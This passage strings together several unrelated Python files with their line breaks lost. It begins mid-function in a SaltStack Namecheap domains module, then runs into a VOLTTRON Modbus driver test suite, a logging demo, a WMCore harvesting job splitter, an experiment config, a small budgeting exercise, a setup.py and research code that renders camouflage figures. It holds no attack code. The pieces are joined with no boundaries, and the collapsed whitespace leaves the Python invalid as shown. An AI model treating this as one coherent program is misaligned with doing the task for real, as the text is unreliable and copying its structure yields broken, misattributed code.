get_info(domain_name): ''' Returns information about the requested domain returns a dictionary of information about the domain_name domain_name string Domain name to get information about CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.get_info my-domain-name ''' opts = salt.utils.namecheap.get_opts('namecheap.domains.getinfo') opts['DomainName'] = domain_name response_xml = salt.utils.namecheap.get_request(opts) if response_xml is None: return [] domaingetinforesult = response_xml.getElementsByTagName("DomainGetInfoResult")[0] return salt.utils.namecheap.xml_to_dict(domaingetinforesult) def get_tld_list(): ''' Returns a list of TLDs as objects CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.get_tld_list ''' response_xml = salt.utils.namecheap.get_request(salt.utils.namecheap.get_opts('namecheap.domains.gettldlist')) if response_xml is None: return [] tldresult = response_xml.getElementsByTagName("Tlds")[0] tlds = [] for e in tldresult.getElementsByTagName("Tld"): tld = salt.utils.namecheap.atts_to_dict(e) tld['data'] = e.firstChild.data categories = [] subcategories = e.getElementsByTagName("Categories")[0] for c in subcategories.getElementsByTagName("TldCategory"): categories.append(salt.utils.namecheap.atts_to_dict(c)) tld['categories'] = categories tlds.append(tld) return tlds def get_list(list_type=None, search_term=None, page=None, page_size=None, sort_by=None): ''' Returns a list of domains for the particular user as a list of objects offset by ``page`` length of ``page_size`` list_type string Possible values are ALL/EXPIRING/EXPIRED Default: ALL search_term string Keyword to look for on the domain list page integer Page to return Default: 1 page_size integer Number of domains to be listed in a page Minimum value is 10 and maximum value is 100 Default: 20 sort_by string Possible values are NAME/NAME_DESC/EXPIREDATE/ EXPIREDATE_DESC/CREATEDATE/CREATEDATE_DESC CLI Example: .. code-block:: bash salt 'my-minion' namecheap_domains.get_list ''' opts = salt.utils.namecheap.get_opts('namecheap.domains.getList') if list_type is not None: if list_type not in ['ALL', 'EXPIRING', 'EXPIRED']: salt.utils.namecheap.log.error('Invalid option for list_type') raise Exception('Invalid option for list_type') opts['ListType'] = list_type if search_term is not None: if len(search_term) > 70: salt.utils.namecheap.log.warning('search_term trimmed to first 70 characters') search_term = search_term[0:70] opts['SearchTerm'] = search_term if page is not None: opts['Page'] = page if page_size is not None: if page_size > 100 or page_size < 10: salt.utils.namecheap.log.error('Invalid option for page') raise Exception('Invalid option for page') opts['PageSize'] = page_size if sort_by is not None: if sort_by not in ['NAME', 'NAME_DESC', 'EXPIREDATE', 'EXPIREDATE_DESC', 'CREATEDATE', 'CREATEDATE_DESC']: salt.utils.namecheap.log.error('Invalid option for sort_by') raise Exception('Invalid option for sort_by') opts['SortBy'] = sort_by response_xml = salt.utils.namecheap.get_request(opts) if response_xml is None: return [] domainresult = response_xml.getElementsByTagName("DomainGetListResult")[0] domains = [] for d in domainresult.getElementsByTagName("Domain"): domains.append(salt.utils.namecheap.atts_to_dict(d)) return domains
import pytest import gevent import logging import time from volttron.platform import get_services_core from master_driver.interfaces.modbus_tk.server import Server from master_driver.interfaces.modbus_tk.maps import Map, Catalog logger = logging.getLogger(__name__) # modbus_tk driver config DRIVER_CONFIG_STRING = """{ "driver_config": { "name": "write_single_registers", "device_address": "", "port": 5020, "slave_id": 1, "baudrate": 9600, "bytesize": 8, "parity": "none", "stopbits": 1, "xonxoff": 0, "addressing": "offset", "endian": "big", "write_multiple_registers": false, "register_map": "config://write_single_registers_map.csv" }, "driver_type": "modbus_tk", "registry_config": "config://write_single_registers.csv", "interval": 120, "timezone": "UTC" }""" # modbus_tk csv config REGISTRY_CONFIG_STRING = """Volttron Point Name,Register Name unsigned short,unsigned_short sample bool,sample_bool""" REGISTRY_CONFIG_MAP = """Register Name,Address,Type,Units,Writable,Default Value,Transform unsigned_short,0,uint16,None,TRUE,0,scale(10) sample_bool,16,bool,None,TRUE,False,""" @pytest.fixture(scope="module") def agent(request, volttron_instance): """Build MasterDriverAgent, add modbus driver & csv configurations """ # Build master driver agent md_agent = volttron_instance.build_agent() # Clean out master driver configurations md_agent.vip.rpc.call('config.store', 'manage_delete_store', 'platform.driver') # Add driver configurations md_agent.vip.rpc.call('config.store', 'manage_store', 'platform.driver', 'devices/write_single_registers', DRIVER_CONFIG_STRING, config_type='json') # Add csv configurations md_agent.vip.rpc.call('config.store', 'manage_store', 'platform.driver', 'write_single_registers.csv', REGISTRY_CONFIG_STRING, config_type='csv') md_agent.vip.rpc.call('config.store', 'manage_store', 'platform.driver', 'write_single_registers_map.csv', REGISTRY_CONFIG_MAP, config_type='csv') master_uuid = volttron_instance.install_agent(agent_dir=get_services_core("MasterDriverAgent"), config_file={}, start=True) gevent.sleep(10) # wait for the agent to start and start the devices def stop(): """Stop master driver agent """ volttron_instance.stop_agent(master_uuid) md_agent.core.stop() request.addfinalizer(stop) return md_agent @pytest.fixture(scope='class') def modbus_server(request): ModbusClient = Catalog()['write_single_registers'].get_class() server_process = Server(address='', port=5020) server_process.define_slave(1, ModbusClient, unsigned=False) server_process.start() time.sleep(1) yield server_process time.sleep(1) server_process.stop() @pytest.mark.usefixtures("modbus_server") class TestModbusTKDriver: """ Regression tests for the write_single_registers driver interface. """ def get_point(self, agent, point_name): """ Issue a get_point RPC call for the named point and return the result. @param agent: The test Agent. @param point_name: The name of the point to query. @return: The actual reading value of the point name from the RPC call. """ return agent.vip.rpc.call('platform.driver', 'get_point', 'write_single_registers', point_name).get(timeout=10) def set_point(self, agent, point_name, point_value): """ Issue a set_point RPC call for the named point and value, and return the result. @param agent: The test Agent. @param point_name: The name of the point to query. @param point_value: The value to set on the point. @return:The actual reading value of the point name from the RPC call. """ return agent.vip.rpc.call('platform.driver', 'set_point', 'write_single_registers', point_name, point_value).get(timeout=10) def scrape_all(self, agent): """ Issue a get_point RPC call for the device and return the result. @param agent: The test Agent. @return: The dictionary mapping point names to their actual values from the RPC call. """ return agent.vip.rpc.call('platform.driver', 'scrape_all', 'write_single_registers').get(timeout=10) def revert_all(self, agent): """ Issue a get_point RPC call for the device and return the result. @param agent: The test Agent. @return: Return value from the RPC call. """ return agent.vip.rpc.call('platform.driver', 'revert_device', 'write_single_registers').get(timeout=10) def revert_point(self, agent, point_name): """ Issue a get_point RPC call for the named point and return the result. @param agent: The test Agent. @param point_name: The name of the point to query. @return: Return value from the RPC call. """ return agent.vip.rpc.call('platform.driver', 'revert_point', 'write_single_registers', point_name).get(timeout=10) def test_default_values(self, agent): """Test set default values """ self.revert_all(agent) default_values = self.scrape_all(agent) assert type(default_values) is dict for key in default_values.keys(): assert default_values[key] == 0 def test_set_point(self, agent): """Test set points to a new values """ set_value = self.set_point(agent, 'unsigned short', 6530) assert set_value == 6530 set_value = self.set_point(agent, 'sample bool', True) assert set_value == True def test_get_point(self, agent): """Test get point after set point """ self.set_point(agent, 'unsigned short', 1230) get_value = self.get_point(agent, 'unsigned short') assert get_value == 1230 def test_revert_point(self, agent): """Test revert point to default value """ self.revert_point(agent, 'unsigned short') get_value = self.get_point(agent, 'unsigned short') assert get_value == 0 self.revert_point(agent, 'sample bool') get_value = self.get_point(agent, 'sample bool') assert get_value == False def test_revert_all(self, agent): """Test revert device to default values """ self.revert_all(agent) default_values = self.scrape_all(agent) assert type(default_values) is dict for key in default_values.keys(): assert default_values[key] == 0
from fastlogging import LogInit if __name__ == "__main__": logger = LogInit(console = True, colors = True) logger.debug("This is a debug message.") logger.info("This is an info message.") logger.warning("This is a warning message.") logger.error("This is an error message.") logger.fatal("This is a fatal message.") logger.rotate() logger.fatal("This is a fatal message.") logger.fatal("This is a fatal message.") logger.fatal("This is a fatal message.") logger.shutdown()
#!/usr/bin/env python """ _Harvest_ """ from future.utils import viewitems import threading import logging from WMCore.JobSplitting.JobFactory import JobFactory from WMCore.Services.UUIDLib import makeUUID from WMCore.DAOFactory import DAOFactory from WMCore.JobSplitting.LumiBased import isGoodRun, isGoodLumi from WMCore.DataStructs.Run import Run from WMCore.WMSpec.WMTask import buildLumiMask class Harvest(JobFactory): """ _Harvest_ Job splitting algoritm which creates a single job for all files in the fileset (not neccessarily just available files). Two distinct modes, Periodic and EndOfRun. In Periodic mode, we periodically create a job processing all files. A job will not be created until the previous job (if there is one) has been completed and there are new available files in the fileset. The specified period is the amount of time in seconds between the end of a job and the creation of another job. In EndOfRun mode, create a job processing all files once the input file has been closed. This means there will only be a single job in total for the subscription. For the EndOfRun mode support a sibling parameters that is set if there is also a Periodic subscription. In this case wait until the Periodic subscription is finished before triggering the EndOfRun harvesting. """ def createJobsLocationWise(self, fileset, endOfRun, dqmHarvestUnit, lumiMask, goodRunList): myThread = threading.currentThread() fileset.loadData(parentage=0) allFiles = fileset.getFiles() # sort by location and run locationDict = {} runDict = {} for fileInfo in allFiles: locSet = frozenset(fileInfo['locations']) runSet = fileInfo.getRuns() if len(locSet) == 0: logging.error("File %s has no locations!", fileInfo['lfn']) if len(runSet) == 0: logging.error("File %s has no run information!", fileInfo['lfn']) # Populate a dictionary with [location][run] so we can split jobs according to those different combinations if locSet not in locationDict: locationDict[locSet] = {} fileInfo['runs'] = set() # Handle jobs with run whitelist/blacklist if goodRunList: runDict[fileInfo['lfn']] = set() for run in runSet: if run.run in goodRunList: runDict[fileInfo['lfn']].add(run) if run.run in locationDict[locSet]: locationDict[locSet][run.run].append(fileInfo) else: locationDict[locSet][run.run] = [fileInfo] elif lumiMask: # it has lumiMask, thus we consider only good run/lumis newRunSet = [] for run in runSet: if not isGoodRun(lumiMask, run.run): continue # then loop over lumis maskedLumis = [] for lumi in run.lumis: if not isGoodLumi(lumiMask, run.run, lumi): continue maskedLumis.append(lumi) if not maskedLumis: continue maskedRun = Run(run.run, *maskedLumis) newRunSet.append(maskedRun) if run.run in locationDict[locSet]: locationDict[locSet][run.run].append(fileInfo) else: locationDict[locSet][run.run] = [fileInfo] if newRunSet: runDict[fileInfo['lfn']] = newRunSet else: # no LumiList and no run white or black list runDict[fileInfo['lfn']] = runSet for run in runSet: if run.run in locationDict[locSet]: locationDict[locSet][run.run].append(fileInfo) else: locationDict[locSet][run.run] = [fileInfo] # create separate jobs for different locations self.newGroup() self.jobCount = 0 baseName = makeUUID() self.newGroup() if endOfRun: harvestType = "EndOfRun" else: harvestType = "Periodic" for location in locationDict: if dqmHarvestUnit == "byRun": self.createJobByRun(locationDict, location, baseName, harvestType, runDict, endOfRun) else: self.createMultiRunJob(locationDict, location, baseName, harvestType, runDict, endOfRun) return def createJobByRun(self, locationDict, location, baseName, harvestType, runDict, endOfRun): """ _createJobByRun_ Creates one job per run for all files available at the same location. """ for run in locationDict[location]: # Should create at least one job for every location/run, putting this here will do self.jobCount += 1 self.newJob(name="%s-%s-Harvest-%i" % (baseName, harvestType, self.jobCount)) for f in locationDict[location][run]: for fileRun in runDict[f['lfn']]: if fileRun.run == run: self.currentJob['mask'].addRun(fileRun) break self.currentJob.addFile(f) if endOfRun: self.currentJob.addBaggageParameter("runIsComplete", True) self.mergeLumiRange(self.currentJob['mask']['runAndLumis']) return def createMultiRunJob(self, locationDict, location, baseName, harvestType, runDict, endOfRun): """ _createMultiRunJob_ Creates a single harvesting job for all files and runs available at the same location. """ self.jobCount += 1 self.newJob(name="%s-%s-Harvest-%i" % (baseName, harvestType, self.jobCount)) for run in locationDict[location]: for f in locationDict[location][run]: for fileRun in runDict[f['lfn']]: if fileRun.run == run: self.currentJob['mask'].addRun(fileRun) break if f not in self.currentJob['input_files']: self.currentJob.addFile(f) if endOfRun: self.currentJob.addBaggageParameter("runIsComplete", True) self.mergeLumiRange(self.currentJob['mask']['runAndLumis']) # now calculate the minimum and maximum run number, it has to go to the root name minRun = min(self.currentJob['mask']['runAndLumis'].keys()) maxRun = max(self.currentJob['mask']['runAndLumis'].keys()) self.currentJob.addBaggageParameter("multiRun", True) self.currentJob.addBaggageParameter("runLimits", "-%s-%s" % (minRun, maxRun)) return def mergeLumiRange(self, runLumis): """ _mergeLumiRange_ Merges the interesection of lumi ranges. """ for run, lumis in viewitems(runLumis): lumis.sort(key=lambda sublist: sublist[0]) fixedLumis = [lumis[0]] for lumi in lumis: if (fixedLumis[-1][1] + 1) >= lumi[0]: fixedLumis[-1][1] = lumi[1] else: fixedLumis.append(lumi) self.currentJob['mask']['runAndLumis'][run] = fixedLumis def algorithm(self, *args, **kwargs): """ _algorithm_ """ myThread = threading.currentThread() periodicInterval = kwargs.get("periodic_harvest_interval", 0) periodicSibling = kwargs.get("periodic_harvest_sibling", False) dqmHarvestUnit = kwargs.get("dqmHarvestUnit", "byRun") runs = kwargs.get("runs", None) lumis = kwargs.get("lumis", None) runWhitelist = set(kwargs.get('runWhitelist', [])) runBlacklist = set(kwargs.get('runBlacklist', [])) goodRunList = runWhitelist.difference(runBlacklist) daoFactory = DAOFactory(package="WMCore.WMBS", logger=myThread.logger, dbinterface=myThread.dbi) releasePeriodicJobDAO = daoFactory(classname="JobSplitting.ReleasePeriodicJob") periodicSiblingCompleteDAO = daoFactory(classname="JobSplitting.PeriodicSiblingComplete") fileset = self.subscription.getFileset() fileset.load() lumiMask = {} if runs and lumis: lumiMask = buildLumiMask(runs, lumis) if periodicInterval and periodicInterval > 0: # Trigger the Periodic Job if # * it is the first job OR # * the last job ended more than periodicInterval seconds ago triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription["id"], period=periodicInterval) if triggerJob: myThread.logger.debug("Creating Periodic harvesting job") self.createJobsLocationWise(fileset, False, dqmHarvestUnit, lumiMask, goodRunList) elif not fileset.open: # Trigger the EndOfRun job if # * (same as Periodic to not have JobCreator go nuts and stop after the first iteration) # * there is no Periodic sibling subscription OR # * the Periodic sibling subscription is complete triggerJob = releasePeriodicJobDAO.execute(subscription=self.subscription["id"], period=3600) if triggerJob and periodicSibling: triggerJob = periodicSiblingCompleteDAO.execute(subscription=self.subscription["id"]) if triggerJob: myThread.logger.debug("Creating EndOfRun harvesting job") self.createJobsLocationWise(fileset, True, dqmHarvestUnit, lumiMask, goodRunList) return
Experiment(description='Trying latest code on classic data sets', data_dir='../data/tsdlr-renamed/', max_depth=10, random_order=False, k=1, debug=False, local_computation=False, n_rand=9, sd=2, jitter_sd=0.1, max_jobs=400, verbose=False, make_predictions=False, skip_complete=True, results_dir='../results/2014-01-16-GPSS-full/', iters=250, base_kernels='SE,Per,Lin,Const,Noise', random_seed=3, period_heuristic=3, max_period_heuristic=5, period_heuristic_type='min', subset=True, subset_size=250, full_iters=10, bundle_size=5, additive_form=False, mean='ff.MeanZero()', # Starting mean kernel='ff.NoiseKernel()', # Starting kernel lik='ff.LikGauss(sf=-np.Inf)', # Starting likelihood score='bic', search_operators=[('A', ('+', 'A', 'B'), {'A': 'kernel', 'B': 'base'}), ('A', ('*', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}), ('A', ('*-const', 'A', 'B'), {'A': 'kernel', 'B': 'base-not-const'}), ('A', 'B', {'A': 'kernel', 'B': 'base'}), ('A', ('CP', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}), ('A', ('CW', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}), ('A', ('B', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}), ('A', ('BL', 'd', 'A'), {'A': 'kernel', 'd' : 'dimension'}), ('A', ('None',), {'A': 'kernel'})])
movie_budget = float(input()) amount_of_statists = int(input()) price_for_clothes_for_one_statist = float(input()) decor = movie_budget * (10/100) total_price_for_clothes = price_for_clothes_for_one_statist * amount_of_statists if amount_of_statists > 150: total_price_for_clothes *= 0.90 total_movie_amount = total_price_for_clothes + decor if total_price_for_clothes + decor > movie_budget: print("Not enough money!") print(f"Wingard needs {total_movie_amount - movie_budget:.2f} leva more.") elif total_price_for_clothes + decor <= movie_budget: print("Action!") print(f"Wingard starts filming with {movie_budget - total_movie_amount:.2f} leva left.")
from setuptools import setup, find_packages with open('README.md') as f: readme = f.read() setup( name='Workbench', version='0.1.1', description='Timesaver for psd2html (markup)', long_description=readme, author='Bohdan Khorolets', author_email='[email protected]', url='https://github.com/khorolets/workbench', packages=find_packages(), entry_points={ 'console_scripts': [ 'workbench = workbench.__init__:manager.run', ], }, install_requires=list(filter(None, [ 'flask', 'flask-script', 'elizabeth', ])), )
import util as ut, glob, os, dset, box, img as ig, experiments, numpy as np, scipy.io, camo, copy, rotation, mvg, imtable, iputil as ip, pylab, planefit, glob, tour # Code for generating the figures/videos in the paper and the talk RESDIR_LOO = '/data/scratch/aho/camo-results/camera-ready-loo/loo' RESDIR_NOLOO = '/data/scratch/aho/camo-results/camera-ready-noloo/noloo' STATS_PATH = '/data/vision/billf/camo/camo/nondetect/results/stats/stats.pk' ALL_SCENES = experiments.classic_scenes + experiments.new_scenes def make_path(loo_s, alg_name, scene = ''): assert loo_s in ('loo', 'noloo') base = RESDIR_LOO if loo_s == 'loo' else RESDIR_NOLOO return ut.pjoin(base, idx_from_alg(alg_name), scene) def idx_from_alg(alg_name): return str(METHODS.index(alg_name)+1) def path_from_scene(scene): return ut.pjoin('../data', scene) # duplicated from 4-8 in experiments.py METHODS = ['uniform', 'mean', 'random', 'greedy', 'occlusion', 'stable-robust', 'occlusion-wide', 'interior-wide', 'occlusion-wide-nostable'] tested_scenes = experiments.classic_scenes + experiments.new_scenes def make_teaser(): name = 'bookshelf-real' in_dir = make_path('noloo', 'interior-wide', name) out_dir = '../results/teaser-bookshelf-interior' ut.mkdir(out_dir) print in_dir for in_fname in sorted(glob.glob(ut.pjoin(in_dir, '*.jpg'))): base = os.path.split(in_fname)[1] out_fname = ut.pjoin(out_dir, base.replace('.jpg', '.pdf')) assert not os.path.exists(out_fname) print in_fname, out_fname os.system('convert %s %s' % (in_fname, out_fname)) def make_scene_fig(nscenes = 20, ims_per_scene = 2, todo = ['fig']): with ut.constant_seed(0): method = 'occlusion-wide' # random sample #all_scenes = sorted(glob.glob(make_path('noloo', method, '*'))) #scenes = ut.sample_at_most(all_scenes, nscenes) #already_in_paper = 'couch3-real bookshelf-real'.split() already_in_paper = ''.split() ok_scenes = [] # these mess up the diagram for scene in tested_scenes: shape = dset.Scan(path_from_scene(scene)).full_shape ratio = (float(shape[1]) / float(shape[0])) if abs(ratio - 1.5 ) >= 0.01 or (scene in already_in_paper): print 'skipping', scene, 'bad aspect ratio', ratio, 'or already in paper' else: ok_scenes.append(scene) #scenes = ut.sample_at_most(ut.shuffled(scenes), nscenes) scenes = ut.sample_at_most(ut.shuffled(ok_scenes), nscenes) print '\n'.join(scenes) if 'show' in todo: table = [] for scene in scenes: print scene scan = dset.Scan(path_from_scene(scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0] row = [scene] assert ims_per_scene == 2 # show frames from this result # choose two that aren't used in the solution and which are representative viewpoints # this is nontrivial to do programmatically; pick them by hand # include in the UI a way to verify that the same image is not being used # note that due to the sampling some views might be of faces that have no label (check this!) for frame in scan.frames: row += [frame, ('cycle', [mesh.render(scan, frame, texel_colors), scan.im(frame)])] table.append(row) ig.show(table) if 'fig' in todo: frame_choices = \ {'mit-31' : 11, 'mit-29' : 0, 'disrupt-8' : 12, 'mit-12': 15, 'patio2-real' : 1, 'walden-tree1' : 9, 'mit-12' : 19, 'mit-21' : 8, 'charlottesville-6' : 6, 'walden-log' : 6, 'charlottesville-2' : 8, 'charlottesville-9' : 6, 'charlottesville-1' : 7, 'disrupt-6' : 0, 'mit-20' : 3, 'mit-14': 13, 'walden-tree3' : 0, 'mit-6' : 6, 'mit-1' : 8, 'mit-5' : 16, 'couch3-real' : 6, 'bookshelf-real' : 3, 'charlottesville-7' : 9, 'mit-26' : 8, 'mit-28' : 13, 'mit-13' : 7, 'disrupt-11' : 7, 'couch5-real' : 2, 'walden-brush2' : 0, 'mit-9' : 0, 'mit-27' : 0, 'charlottesville-3' : 1, 'mit-37' : 4, 'mit-16' : 13, } out_base = '../results/scene-fig' #assert not os.path.exists(out_base) ut.mkdir(out_base) scene_acc = ut.load(STATS_PATH) scenes_by_easiness = sorted(scenes, key = lambda x : -np.mean(scene_acc[x, idx_from_alg(method)])) for si, scene in enumerate(scenes_by_easiness): print scene, np.mean(scene_acc[scene, idx_from_alg(method)]) # easier than deriving the image number from the output files scan = dset.Scan(path_from_scene(scene)) texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0] frame = frame_choices[scene] #out_path = ut.pjoin(out_base, 'scene-%d.pdf' % (1+si)) out_path = ut.pjoin(out_base, 'scene-%d.png' % (1+si)) #assert not os.path.exists(out_path) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) ig.save(out_path, mesh.render(scan, frame, texel_colors)) def make_multiview_fig(n = None): method = 'occlusion-wide' scene_choices = ['mit-1', 'charlottesville-1', 'disrupt-11'] frame_choices = {'mit-1' : [0, 3, 7, 10], 'charlottesville-1' : [0, 2, 5, 8], 'disrupt-11' : [0, 4, 7, 10]} out_base = '../results/multiview-fig' #assert not os.path.exists(out_base) ut.mkdir(out_base) for si, scene in enumerate(scene_choices[:n]): scan = dset.Scan(path_from_scene(scene)) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) frames = frame_choices[scene] for fi, frame in enumerate(frames): out_path = ut.pjoin(out_base, 'scene-%d-%d.png' % (1+si, 1+fi)) #assert not os.path.exists(out_path) texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0] #ig.save(out_path, mesh.render(scan, frame, texel_colors)) #ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True)) if scene == 'mit-1': occ_thresh = 1.25#1.8 else: occ_thresh = None if scene == 'charlottesville-1': occ_thresh = 2.5 d_sc = 1.2 else: d_sc = 1. ig.save(out_path, render_cube(scan.path, mesh, texel_colors, frame, 200, outline = True, frame_using_cube = True, occ_thresh = occ_thresh, dim_sc = d_sc)) # def dilate_occ(scan, mesh, frame): # occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True) # as_juv = mesh.index_as_juv(occ).copy() # for j in xrange(as_juv.shape[0]): # #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True) # if np.any(as_juv[j]): # dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True) # dist[ind[0] < 0] = 1e10 # as_juv[j, dist <= 10] = True # return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv)) def clean_occ(scan, mesh, frame): occ = camo.occlusion_texels(scan, mesh, frame, thresh = 1.5, only_border = True) as_juv = mesh.index_as_juv(occ).copy() for j in xrange(as_juv.shape[0]): w, h = as_juv.shape[1:] for u, v in [(0, range(h)), (range(w), 0), (range(w), -1), (-1, range(h))]: as_juv[j, u, v] = (np.mean(as_juv[j, u, v]) >= 0.5) #dist, ind = scipy.ndimage.distance_transform_edt(1 - as_juv[j], return_indices = True) # if np.any(as_juv[j]): # dist, ind = scipy.ndimage.distance_transform_bf(1 - as_juv[j], metric = 'taxicab', return_indices = True) # dist[ind[0] < 0] = 1e10 # as_juv[j, dist <= 10] = True return np.logical_and(mesh.texel_visible(scan, frame), mesh.index_as_flat(as_juv)) def scan_fullres(fr, path): if fr: return dset.Scan(path, max_dim = None) else: return dset.Scan(path) def occlusion_mask(scan, mesh, frame, thresh = 2., outline = False): mask = box.mask(scan, mesh, frame) #D = scipy.ndimage.distance_transform_edt(mask) D = scipy.ndimage.distance_transform_edt(mask) return D <= thresh, D #return np.logical_and(mask, D <= thresh) def mark_occlusion_texels(tc, scan, mesh, frame, thresh, mesh_occ_mask = None, p = 1): tc = tc.copy() mask = box.mask(scan, mesh, frame) if mesh_occ_mask is not None: mask = (mask & -mesh_occ_mask) D = scipy.ndimage.distance_transform_edt(mask) #occ_mask = np.array(occlusion_mask(scan, mesh, frame, thresh = thresh), 'd') occ_mask = np.array(D, 'd') vis = mesh.texel_visible(scan, frame) proj = scan.project(frame, mesh.texel_pts) proj = np.array(np.round(proj), 'l') occ = np.zeros(mesh.ntexels, 'd') occ[vis] = occ_mask[proj[vis, 1], proj[vis, 0]] w = np.zeros_like(occ) w[occ < thresh] = p#1 # scale the texels that are not totally on the boundary ok = (thresh <= occ) & (occ < 1+thresh) # anti-alias and (optionally) weight w[ok] = p*((1+thresh) - occ[ok]) assert np.all((0 <= w) & (w <= 1)) tc = tc*(1-w[:, np.newaxis]) + 255*w[:, np.newaxis] return tc def render_cube(scene, mesh, texel_colors, frame, crop_size, fullres = False, outline = False, frame_using_cube = False, occ_thresh = None, draw_boundaries = False, im = None, use_fr = True, dim_sc = 1., show_cube = True): scan = scan_fullres(fullres, scene) if im is None: im_input = scan.im(frame) else: im_input = im tc = texel_colors.copy() mask = box.mask(scan, mesh, frame) ys, xs = np.nonzero(mask) cx, cy = map(int, np.mean(np.array([xs, ys]), axis = 1)) if frame_using_cube: box_rect = ut.bbox2d(np.array([xs, ys]).T) d = int(round(dim_sc * min(4*max(box_rect[2:]), min(scan.im(0).shape[:2]) - 1))) rect = ut.rect_centered_at(cx, cy, d, d) rect = ut.shift_in_bounds(scan.im(0).shape, rect) scale = float(crop_size)/rect[2] print box_rect, rect, scale else: rect = None scale = 1. # if not show_cube: # im = scan.im(frame) # rect = ut.rect_centered_at(cx, cy, crop_size, crop_size) # crop_size /= scan_fullres(False, scan.path).scale # return ig.sub_img(im, ut.rect_im_intersect(im, rect)) if outline: if rect is not None: assert rect[2] == rect[3] #scan_fr = scan_fullres(True, scene) scan_fr = scan_fullres(use_fr, scene) print 'scale', scale if occ_thresh is None: occ_thresh = 2. occ_thresh /= scale # occ = camo.occlusion_texels(scan_fr, mesh, frame, thresh = occ_thresh, only_border = False) # tc[occ] = 255 tc = mark_occlusion_texels(tc, scan_fr, mesh, frame, thresh = occ_thresh) im_up = ig.resize(im_input, scan_fr.im(frame).shape) #im = ig.resize(mesh.render(scan_fr, frame, tc, im = im_up), scan.im(frame).shape) im_fr = mesh.render(scan_fr, frame, tc, im = im_up) im = ig.resize(im_fr, scan.im(frame).shape) if not show_cube: im = scan.im(frame) #ig.show([im_fr, im]) #assert im.shape[0] == im.shape[1] else: if show_cube: im = mesh.render(scan, frame, tc) else: im = scan.im(frame) if rect is not None: if draw_boundaries: return ig.draw_rects(im, [rect]) else: return ig.sub_img(im, rect) if fullres: crop_size /= scan_fullres(False, scan.path).scale #sc = (crop_size/2.)/float(box_rect[2]) elif crop_size is None: return im else: rect = ut.rect_centered_at(cx, cy, crop_size, crop_size) return ig.sub_img(im, ut.rect_im_intersect(im, rect)) def make_real_cube(): scene = 'bookshelf-real' method = 'interior-wide' scan = dset.Scan(path_from_scene(scene)) #texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]) if 0: print 'hires' mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512) scan = dset.Scan(path_from_scene(scene), max_dim = 2000) texel_colors = camo.camo(scan, mesh, ut.Struct(method = 'interior-wide')) ut.save('../results/real-interior.pk', texel_colors) ut.toplevel_locals() elif 1: # upgrade to larger texel size; bigger images texel_colors0, results0, labels0 = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][:3] mesh0 = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 256) texsize = 1024 mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize) geom = camo.Geom(scan, mesh) scan = dset.Scan(path_from_scene(scene), max_dim = 2000) label_color, label_valid = camo.label_colors(scan, mesh, geom, labels0, invisible_colors = True) as_juv0 = mesh0.index_as_juv(results0).copy() as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy() for j in xrange(as_juv0.shape[0]): as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False) results1 = np.array(mesh.index_as_flat(as_juv1), 'l') texel_colors = camo.from_color_space_2d(label_color[range(len(results1)), results1]) #texel_colors = label_color[range(len(results1)), results1] ut.toplevel_locals() elif 0: texel_colors = ut.load('../results/real-interior.pk')[0] mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = 512) else: mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat')) texel_colors = ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0] texel_colors = camo.to_color_space_2d(texel_colors) texel_colors = mesh.index_as_juv(texel_colors) out_path = '../results/real/colors.mat' scipy.io.savemat(out_path, {'texel_colors' : texel_colors}) import matlab matlab.matlab_cmd('/data/vision/billf/camo/camo', 'load_real_cube') def make_printable_pattern(scene_path, mesh0, texel_colors0, results0, labels0, geom = None): #texel_colors = camo.to_color_space_2d(ut.load(ut.pjoin(make_path('noloo', method, scene), 'data.pk'))['ret'][0]) # upgrade to larger texel size; bigger images #texsize = 1024 texsize = 4096 #scan = dset.Scan(scene_path, max_dim = 2000) scan = dset.Scan(scene_path, max_dim = None) mesh = box.load_from_mat(ut.pjoin(scan.path, 'cube.mat'), texsize = texsize) as_juv0 = mesh0.index_as_juv(results0).copy() as_juv1 = mesh.index_as_juv(np.zeros(mesh.ntexels)).copy() for j in xrange(as_juv0.shape[0]): as_juv1[j] = ig.resize(as_juv0[j], as_juv1[j].shape[:2], order = 0, hires = False) results1 = np.array(mesh.index_as_flat(as_juv1), 'l') labels = np.array(labels0, 'double') labels[:, 1:] *= scan.scale/dset.Scan(scene_path).scale print labels texel_colors = np.zeros((mesh.ntexels, 3)) if geom is None: geom = camo.Geom(scan, mesh) print len(np.unique(results1)) for label in np.unique(results1): print 'trying', label label = int(label) frame = int(labels[label, 0]) valid, colors = camo.project_texels(scan, frame, mesh, scan.im(frame), geom, labels[label, 1:]) ok = results1 == label texel_colors[ok] = colors[ok] #texel_colors = label_color[range(len(results1)), results1] 